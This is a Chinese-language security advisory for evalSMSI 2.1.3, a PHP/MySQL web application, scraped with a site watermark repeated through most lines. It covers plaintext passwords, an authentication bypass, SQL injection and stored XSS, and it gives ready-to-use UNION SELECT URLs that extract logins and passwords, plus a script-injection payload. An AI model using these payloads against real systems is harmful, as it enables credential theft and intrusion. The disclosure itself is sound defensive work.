发布日期:2010-02-05
uVZ中国红客联盟-全球最大的红客组织更新日期:2010-02-09
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织受影响系统: evalSMSI evalSMSI 2.1.3
不受影响系统: evalSMSI evalSMSI 2.2
描述:
BUGTRAQ ID: 38116
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织evalSMSI是用PHP/MySQL开发的WEB应用,用于评估信息安全管理系统。
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织evalsmsi中存在多个输入验证和明文口令等安全
漏洞,远程攻击者可以利用这些
漏洞获得非授权访问或执行SQL注入、跨站脚本等攻击。
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织1 - 不安全口令存储
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织数据库中以明文存储了口令:
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织table : authentification
uVZ中国红客联盟-全球最大的红客组织column: password
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织2 - 绕过认证
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织用户可通过ajax.php提交某些请求,这样就无需认证便获得了对应用的访问。
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织3 - SQL注入
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织可通过向ajax.php脚本提交恶意参数请求执行跨站脚本攻击。以下是有
漏洞的代码段:
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织$id = $_GET['query'];
uVZ中国红客联盟-全球最大的红客组织$action = $_GET['action'];
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织$base = evalsmsiConnect();
uVZ中国红客联盟-全球最大的红客组织switch ($action) {
uVZ中国红客联盟-全球最大的红客组织case 'sub_par':
uVZ中国红客联盟-全球最大的红客组织$request = "SELECT MAX(numero) FROM sub_paragraphe WHERE id_paragraphe="$id"";
uVZ中国红客联盟-全球最大的红客组织break;
uVZ中国红客联盟-全球最大的红客组织case 'question':
uVZ中国红客联盟-全球最大的红客组织$request = "SELECT * FROM sub_paragraphe WHERE id_paragraphe="$id"";
uVZ中国红客联盟-全球最大的红客组织break;
uVZ中国红客联盟-全球最大的红客组织case 'num_quest':
uVZ中国红客联盟-全球最大的红客组织$request = "SELECT MAX(numero) FROM question WHERE id_sub_paragraphe="$id"";
uVZ中国红客联盟-全球最大的红客组织break;
uVZ中国红客联盟-全球最大的红客组织default:
uVZ中国红客联盟-全球最大的红客组织break;
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织4 - 跨站脚本
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织可向报表的标注框中注入JavaScript,执行存储式跨站脚本攻击。
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织<*来源:ekse
uVZ中国红客联盟-全球最大的红客组织 uVZ中国红客联盟-全球最大的红客组织 链接:http://marc.info/?l=full-disclosure&m=126537085630095&q=p3
uVZ中国红客联盟-全球最大的红客组织*>
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织测试方法:
警 告uVZ中国红客联盟-全球最大的红客组织
uVZ中国红客联盟-全球最大的红客组织
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!uVZ中国红客联盟-全球最大的红客组织
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
uVZ中国红客联盟-全球最大的红客组织http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织</textarea><script>alert('XSS found by Corelan Team');</script>
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织建议:
厂商补丁:
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织evalSMSI
uVZ中国红客联盟-全球最大的红客组织--------
uVZ中国红客联盟-全球最大的红客组织目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
uVZ中国红客联盟-全球最大的红客组织uVZ中国红客联盟-全球最大的红客组织http://sourceforge.net/projects/evalsmsi/
uVZ中国红客联盟-全球最大的红客组织
